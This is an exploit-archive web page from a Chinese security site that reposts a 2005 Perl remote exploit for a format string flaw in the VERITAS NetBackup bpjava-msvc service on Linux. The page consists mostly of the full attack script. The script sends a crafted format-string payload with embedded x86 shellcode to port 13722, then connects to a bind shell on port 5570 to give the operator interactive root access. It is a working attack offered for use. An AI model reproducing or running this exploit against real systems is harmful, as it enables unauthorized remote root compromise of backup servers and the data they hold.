首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VERITAS NetBackup bpjava-msvc Remote Format String Exploit (Linux)
来源:http://www.digitalmunition.com 作者:johnh 发布时间:2005-10-24  

VERITAS NetBackup bpjava-msvc Remote Format String Exploit (Linux)

Port : 13722

#!/usr/bin/perl
######################################################
# VERITAS-Linux.pl - VERITAS NetBackup Format Strings Linux/x86 Remote Exploit
# johnh[at]digitalmunition[dot]com
# bug found by kf_lists[at]digitalmunition[dot]com
# http://www.digitalmunition.com/
#
# This exploit May NOT be posted to a public Archive like k-otik without being
# in its original GPG form (protected by passphrase)
#
######################################################

use POSIX;
use IO::Socket;
use IO::Select;
use strict;

print STDERR "\nveritas.pl - VERITAS NetBackup Format Strings Linux/x86 Remote Exploit\n";

if ($#ARGV == -1) {
print "Usage:\n\t$0 <hostname> <port>\n\n";
exit (1);
}

my $hostName = $ARGV[0];
my $port = $ARGV[1] || 13722;

buildexploit ($hostName, $port);

my $shellport = 5570;
print "[*] Connect to remote shell port\n";
my $sock = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $hostName,
PeerPort => $shellport,
Type => SOCK_STREAM
);

if (! $sock)
{
print "[*] Error, Seems Failed\n";
exit (0);
}

print "[*] G0t R00T\n";

StartShell ($sock);

sub buildexploit
{
my ($host, $port) = @_;
my $s = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $host,
PeerPort => $port,
Type => SOCK_STREAM
);

if (! $s)
{
print "[*] Could not create socket: $!\n";
exit(0);
}

print $s " 118 1\nOWNED BABY\n";
print scalar <$s>;
print scalar <$s>;

my $shellcode = "\x90" x 500 .
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x16\x81\x73\x17\x13\x99".
"\x37\xe2\x83\xeb\xfc\xe2\xf4\x22\x42\xc0\x01\xa3\xff\x64\xa1\x40".
"\xda\x64\x6b\xf2\xd2\xfa\x62\x9a\x5e\x65\x84\x7b\x8c\xf5\xa1\x75".
"\xca\xbe\x03\xa3\x89\x67\xb3\x44\x10\xd6\x52\x75\x54\xb7\x52\x75".
"\x2a\x33\x2f\x93\xc9\x67\xb5\x9a\x78\x74\x52\x75\x54\xb7\x6b\xca".
"\x10\xf4\x52\x2c\xd0\xfa\x62\x52\x7b\xcf\xb3\x7b\xf7\x18\x91\x7b".
"\xf1\x18\xcd\x71\xf0\xbe\x01\x42\xca\xbe\x03\xa3\x92\xfa\x62";
my $retloc = 0x080b50ec; #0x080b53b4;
my $retaddr = 0x80e0658; # can't use shellcode in stack.
my $hi = ($retaddr >> 0) & 0xffff;
my $lo = ($retaddr >> 16) & 0xffff;


$hi = $hi - 0x28;
$lo = (0x10000 + $lo + 0x28) - $hi - 0x50;

my $align = 3;
my $buffer = " 101 6\n" . "a" x $align . pack ('l', $retloc) . pack ('l', $retloc + 2) .
"%." . $hi . "lx" . "%1694\$hn" .
"%." . $lo . "lx" . "%1695\$hn" .
$shellcode . "\n" .
$shellcode . "\n" .
"i\n" . "0wned\n" . "y0u\n".
"boot.ini\n" . "\n";

print STDERR "Sending " .length($buffer) . " bytes to remote\n";
sleep (10);
print $s $buffer;
print scalar <$s>;

close $s;
}

sub StartShell
{
my ($client) = @_;
my $sel = IO::Select->new();


# unbuffered fun.


Unblock(*STDIN);
Unblock(*STDOUT);
Unblock($client);

select($client); $|++;
select(STDIN); $|++;
select(STDOUT); $|++;

$sel->add($client);
$sel->add(*STDIN);

while (fileno($client))
{
my $fd;
my @fds = $sel->can_read(1);

foreach $fd (@fds)
{
my $in = <$fd>;
if (! $in || ! $fd || ! $client)
{
print "[*] Closing connection.\n";
close($client);
exit(0);
}

if ($fd eq $client)
{
print STDOUT $in;
} else {
print $client $in;
}
}
}
close ($client);
exit (0);
}

sub Unblock {
my $fd = shift;
my $flags;
$flags = fcntl($fd,F_GETFL,0) || die "Can't get flags for file handle: $!\n";
fcntl($fd, F_SETFL, $flags|O_NONBLOCK) || die "Can't make handle nonblocking: $!\n";
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·VERITAS NetBackup bpjava-msvc
·VERITAS NetBackup bpjava-msvc
·Ethereal SLIMP3 Protocol Disse
·Microsoft Windows Plug and Pla
·XMail -t Command Line Option H
·Forum Russian Board SQL Inject
·MySpace Worm Source Code
·Mambo user_rating Parameter Re
·RSA SecurID Web Agent IISWebAg
·WordPress <= 1.5.1.1 cat_id
·MailEnable Pro 1.x STATUS Comm
·Claroline E-Learning Applicati
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved